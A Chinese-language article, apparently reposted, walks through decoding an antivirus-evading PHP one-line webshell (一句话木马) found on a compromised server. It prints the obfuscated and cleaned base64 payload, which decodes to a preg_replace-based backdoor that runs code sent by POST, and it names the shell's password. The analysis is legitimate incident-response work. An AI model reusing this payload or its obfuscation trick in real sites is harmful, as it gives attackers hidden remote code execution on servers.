您的位置:首页 > 菜鸟学院 > 关于免杀一句话木马的解密还原

关于免杀一句话木马的解密还原

来源:互联网 | 时间:2015-01-21 20:51:41 | 阅读:186 |    | 分享到:

一次巡查服务器的时候,发现网站存在漏洞,并已被植入后门。因为服务器有安全狗,由此断定后门代码是免杀的。

首先我们看看加密的源码


关于免杀一句话木马的解密还原

 其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接

CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgo

Ii9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”这样的一串不规则的乱码。

现在的程序就变成了这样

关于免杀一句话木马的解密还原

就算不懂PHP源代码都能看出

$rc = str_replace("v","","svtvr_rveplvavce");"svtvr_rveplvavce"中去掉“v”刚好就是“str_replace

那么下面这段加密内容也同样要去掉多余“gc

CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgoI

i9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK

得到一下base64_decode真实的加密内容

CiRoaCA9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIi4icCIuImwiLiJhIi4iYyIuImUiOwokaGgoIi9bZGlzY3V

6XS9lIiwkX1BPU1RbJ2xvdnZldSddLCJBY2Nlc3MiKTsK"

我们在通过base64_decode解密刚才获取的内容看看

关于免杀一句话木马的解密还原


那么真实的密码就暴露了"lovveu"

在上WEB测试密码确实正确。



好特网发布此文仅为传递信息,不代表好特网认同期限观点或证实其描述。

相关视频攻略

更多

扫二维码进入好特网手机版本!

扫二维码进入好特网微信公众号!

本站所有软件,都由网友上传,如有侵犯你的版权,请发邮件admin@haote.com

湘ICP备2022002427号-10 湘公网安备:43070202000427号© 2013~2024 haote.com 好特网